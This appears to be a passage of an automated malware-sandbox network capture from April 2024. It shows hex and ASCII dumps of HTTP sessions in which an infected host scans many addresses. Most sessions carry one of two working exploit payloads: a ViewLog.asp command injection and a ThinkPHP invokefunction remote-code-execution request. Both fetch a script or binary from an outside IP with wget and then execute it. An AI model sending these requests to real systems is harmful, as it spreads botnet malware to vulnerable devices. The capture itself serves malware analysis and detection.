                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        257192.168.2.233728494.122.5.1538080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.103431940 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        258192.168.2.235352231.186.19.1858080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.103776932 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:40.440713882 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:35:36 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        259192.168.2.235454031.200.87.18080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.109958887 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        260192.168.2.234702095.101.250.6180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.197763920 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:40.489945889 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 34 33 66 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 30 26 23 34 36 3b 34 38 38 35 38 34 34 66 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 37 34 33 66 36 35 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 30 26 23 34 36 3b 34 38 38 35 38 34 34 66 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;743f655f&#46;1713105340&#46;4885844f<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;743f655f&#46;1713105340&#46;4885844f</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        261192.168.2.235392695.100.226.19280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.215950012 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:40.526422977 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 66 37 65 31 39 62 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 30 26 23 34 36 3b 32 64 64 37 34 33 32 30 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 35 66 37 65 31 39 62 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 30 26 23 34 36 3b 32 64 64 37 34 33 32 30 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;5f7e19b8&#46;1713105340&#46;2dd74320<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;5f7e19b8&#46;1713105340&#46;2dd74320</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        262192.168.2.233300295.57.137.3680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.285475969 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:40.665896893 CEST29INHTTP/1.1 200 OK
                                                        Apr 14, 2024 16:35:40.665949106 CEST515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        263192.168.2.234396695.100.0.24680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.291743994 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:40.671734095 CEST577INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 355
                                                        Expires: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Date: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 30 26 23 34 36 3b 39 36 30 63 36 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 35 35 37 32 32 63 33 31 26 23 34 36 3b 31 37 31 33 31 30 35 33 34 30 26 23 34 36 3b 39 36 30 63 36 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;55722c31&#46;1713105340&#46;960c6<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;55722c31&#46;1713105340&#46;960c6</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        264192.168.2.234254262.210.102.568080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.397784948 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:40.696264982 CEST207INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        265192.168.2.235511485.208.20.1448080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.410221100 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:40.718218088 CEST970INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 774
                                                        Date: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 38 37 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.87</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        266192.168.2.235609662.221.81.68080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.434962988 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:40.767910957 CEST224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        267192.168.2.233292894.121.204.2548080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.445698977 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        268192.168.2.235271288.207.209.22180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.492605925 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        269192.168.2.234900288.198.133.12880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.521482944 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:40.826314926 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        270192.168.2.233922688.208.6.24580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:40.524982929 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:40.832734108 CEST323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:35:40 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
